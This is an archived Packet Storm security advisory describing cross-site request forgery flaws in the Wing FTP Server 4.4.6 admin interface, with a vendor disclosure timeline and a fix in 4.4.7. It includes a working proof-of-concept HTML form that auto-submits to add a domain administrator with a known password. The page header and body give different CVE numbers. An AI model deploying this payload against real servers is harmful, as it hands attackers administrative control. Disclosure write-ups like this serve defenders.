what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Wing FTP 4.4.6 Cross Site Request Forgery

Wing FTP 4.4.6 Cross Site Request Forgery
Posted Jun 5, 2015
Authored by Alex Haynes

Wing FTP version 4.4.6 suffers from cross site request forgery vulnerabilities.

tags | exploit, vulnerability, csrf
advisories | CVE-2015-4108
SHA-256 | 08cf6c532bd175a4f87a62da6c6708f4eece0547ea170dbc1ee0ff8b6162a252

Wing FTP 4.4.6 Cross Site Request Forgery

Change Mirror Download
Exploit Title: Wing FTP Server Cross-site Request Forgery vulnerabilities
Product: Wing FTP Server
Vulnerable Versions: 4.4.6 and all previous versions
Tested Version: 4.4.6
Advisory Publication: 05/06/2015
Latest Update: 05/06/2015
Vulnerability Type: Cross-site Request Forgery [CWE-352]
CVE Reference: CVE-2015-4018
Credit: Alex Haynes

Advisory Details:


(1) Vendor & Product Description
--------------------------------
Vendor:Wing FTP software

Product & Version:
Wing FTP Server v 4.4.6

Vendor URL & Download:
http://www.wftpserver.com/

Product Description:
"Wing FTP Server is an easy-to-use, secure and feature-rich enterprise FTP Server that can be used in Windows, Linux, Mac OSX and Solaris. It supports a number of file transfer protocols, including FTP, HTTP, FTPS, HTTPS and SFTP server, giving your end-users flexibility in how they connect to the server. And it provides admins with a web based interface to administrate the server from anywhere. You can also monitor server performance and online sessions and even receive email notifications about various events taking place on the server."


(2) Vulnerability Details:
--------------------------
The admin interface of Wing FTP Server is vulnerable to a Cross-site Request Forgery (CSRF) vulnerabilities. All functionalities including (but not limited to), addition and deletion of domain administrators, regular users, starting and stopping servers or creating and deleting FTP domains are vulnerable to Cross-site request Forgeries.


Proof of concept for RCE [CVE-2015-4018]:
-----------------------------------------
POC adds a domain administrator to the FTP server.


<html>
<body>
<form action="http://<server address>:5466/admin_addadmin.html" method="POST">
<input type="hidden" name="admin" value="{"username":"admin2","password":"admin2","oldpassword":"","readonly":0,"domainadmin":1,"domainlist":"test","mydirectory":"","ipmasks":[]}" />
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>


(3) Advisory Timeline:
----------------------
27/05/2015 - First Contact
27/05/2015 - Vendor responds with requests for details of vulnerabilities.
28/05/2015 - Vulnerability details sent with POC.
28/05/2015 - Vendor requests clarification on impact and various attack scenarios.
28/05/2015 - Vulnerability scenarios defined.
29/05/2015 - Vulnerability confirmed and new version 4.4.7 released. Requests a week delay before public disclosure.
05/06/2015 - Public disclosure

(4)Solution:
------------
Fixed in 4.4.7.


(5) Credits:
------------
Discovered by Alex Haynes

References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4018
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-4018
Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    0 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close